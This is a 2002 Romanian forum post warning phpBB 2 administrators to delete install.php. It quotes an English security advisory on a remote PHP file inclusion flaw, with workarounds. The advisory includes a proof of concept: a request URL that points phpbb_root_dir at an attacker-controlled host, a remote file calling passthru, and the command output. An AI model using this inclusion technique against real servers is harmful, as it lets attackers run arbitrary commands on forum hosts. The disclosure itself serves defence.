Security bug - phpBB
Scris: 12-Noi-2002, 11:45:56
In caz ca nu stiati, exista vulnerabilitati interesante in phpBB 2. Ele ii afecteaza pe cei care au fost lenesi si nu au sters install.php dupa instalare. Baietii rai vor avea ocazia sa dea o tura pe serverul vostru si cine stie, poate pica ceva. Ca tot veni vorba, ar fi bine sa nu aveti PHP-Nuke mai mic de 5.5. (preluat de la Romanian Web developers)
http://online.securityfocus.com/archive/1/277318
http://online.securityfocus.com/archive/1/277318
Cod: Selectaţi tot
JCC Security Advisory
June 16, 2002
malicious PHP source injection in phpBB
Description
phpBB is one of popular PHP bulletin board systems.
When allow_url_fopen = On and register_globals = On in php.ini, phpBB has
vulnerability because install.php contains dangerous codes.
So an attacker can include any files into server's PHP codes.
Impact
It's tested on phpBB 2.0.1. but I think all of phpBB 2 is affected.
Workaround
allow_url_fopen = off and register_globals = off.
and if complete install remove or rename install.php.
Or in install.php
-------install.php------------
define('IN_PHPBB', true);
$phpbb_root_path='./';
----------------------------
Put it
-------snip-----------------
$phpbb_root_dir='./';
----------------------------
Good idea to code that <<PHP_CODE
ini_set("register_globals", "Off");
ini_set ("allow_url_fopen", "Off");
PHP_CODE
Tested systems
phpBB 2.0.1 Debian GNU/Linux SID(x86)
Background
We checked the vulnerability with "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE"
and
made a sample code, functions_selects.php,
--------------------includes/functions_selects.php--------------
<? passthru("uname -a"); ?>
-----------------------------------------
and type the following URL to invoke this sample code.
TEST URL : http://URL/install.php?phpbb_root_dir=http://MYBOX/"
-------out put----------------------------
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown
Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
on line 182
Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
on line 183
Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/install.php
on line 346
-----------------------------------------
thx for BlackKnight at r0ar
---
http://jcc.hackerslab.org(at morris Chang)
e-mail : morris@xsdeny.net